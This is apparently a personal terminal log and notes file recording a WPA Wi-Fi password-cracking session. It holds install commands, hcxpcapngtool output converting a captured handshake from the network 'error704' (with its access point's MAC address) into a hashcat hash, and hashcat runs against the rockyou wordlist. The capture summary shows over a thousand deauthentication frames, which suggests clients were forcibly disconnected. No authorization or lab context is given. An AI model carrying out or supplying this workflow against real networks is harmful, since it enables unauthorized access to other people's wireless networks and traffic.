https://youtu.be/JC-osqv7VAA?si=G8tLUGuQBDzOVJMj

https://drive.google.com/drive/folders/1pll5pb7Pq2k9GAUG1ciZVW5j5MM_JB1a

pipx install "wpat[gui]" --system-site-packages --force

sudo apt update && sudo apt install -y python3-dev build-essential python3-pyqt5

sudo apt update && sudo apt install -y python3-dev build-essential python3-pyqt5

h: command not found: cx ❯ hcxpcapngtool no option selected run hcxpcapngtool --help to get more information ❯ sudo hcxpcapngtool -o password.22000 /home/sh/toolsw/hs/handshake_error704_E0-E6-2E-AA-5C-0F_2026-06-04T20-46-36.cap [sudo] contraseña para sh:  hcxpcapngtool 7.1.0 reading from handshake_error704_E0-E6-2E-AA-5C-0F_2026-06-04T20-46-36.cap... failed to read packet 5287 summary capture file -------------------- file name................................: handshake_error704_E0-E6-2E-AA-5C-0F_2026-06-04T20-46-36.cap version (pcap/cap).......................: 2.4 (very basic format without any additional information) timestamp minimum (timestamp)............: 05.06.2026 03:45:42 (1780631142) timestamp maximum (timestamp)............: 05.06.2026 03:46:36 (1780631196) duration of the dump tool (seconds)......: 54 used capture interfaces..................: 1 link layer header type...................: DLT_IEEE802_11 (105) very basic format without any additional information about the quality endianness (capture system)..............: little endian packets inside...........................: 5287 ESSID (total unique).....................: 1 BEACON (total)...........................: 1 BEACON on 2.4 GHz channel (from IE_TAG)..: 9  ACTION (total)...........................: 27 PROBERESPONSE (total)....................: 140 DEAUTHENTICATION (total).................: 1153 DISASSOCIATION (total)...................: 2 AUTHENTICATION (total)...................: 10 AUTHENTICATION (OPEN SYSTEM).............: 10 ASSOCIATIONREQUEST (total)...............: 4 ASSOCIATIONREQUEST (PSK).................: 4 REASSOCIATIONREQUEST (total).............: 2 REASSOCIATIONREQUEST (PSK)...............: 2 WPA encrypted............................: 116 EAP (total)..............................: 2 EAP-EXPANDED.............................: 2 EAP CODE request.........................: 2 EAPOL messages (total)...................: 14 EAPOL RSN messages.......................: 14 EAPOLTIME gap (measured maximum msec)....: 35522 EAPOL ANONCE error corrections (NC)......: not detected EAPOL M1 messages (total)................: 4 EAPOL M2 messages (total)................: 4 EAPOL M3 messages (total)................: 2 EAPOL M4 messages (total)................: 4 EAPOL M4 messages (zeroed NONCE).........: 4 EAPOL pairs (total)......................: 9 EAPOL pairs (best).......................: 1 EAPOL pairs written to 22000 hash file...: 1 (RC checked) EAPOL M12E2 (challenge - ANONCE from M1).: 1 packet read error........................: 1 Information: limited dump file format detected! This file format is a very basic format to save captured network data. It is recommended to use PCAP Next Generation dump file format (or pcapng for short) instead. The PCAP Next Generation dump file format is an attempt to overcome the limitations of the currently widely used (but very limited) libpcap (cap, pcap) format. https://www.wireshark.org/docs/wsug_html_chunked/AppFiles.html#ChAppFilesCaptureFilesSection https://github.com/pcapng/pcapng Information: radiotap header is missing! Radiotap is a de facto standard for 802.11 frame injection and reception. The radiotap header format is a mechanism to supply additional information about frames, from the driver to userspace applications. https://www.radiotap.org/ Warning: too many deauthentication/disassociation frames detected! That can cause that an ACCESS POINT change channel, reset EAPOL TIMER, renew ANONCE and set PMKID to zero. This could prevent to calculate a valid EAPOL MESSAGE PAIR, to get a valid PMKID or to decrypt the traffic. Information: missing frames! This dump file does not contain undirected proberequest frames. An undirected proberequest may contain information about the PSK. It always happens if the capture file was cleaned or it could happen if filter options are used during capturing. That makes it hard to recover the PSK. https://github.com/ZerBea/hcxdumptool/discussions/526

hashcat -m 22000 pmkid_error704_E0-E6-2E-AA-5C-0F_2026-06-04T20-40-55.22000 /usr/share/wordlists/rockyou.txt

hashcat -m 22000 pmkid_error704_E0-E6-2E-AA-5C-0F_2026-06-04T20-40-55.22000 /usr/share/wordlists/rockyou.txt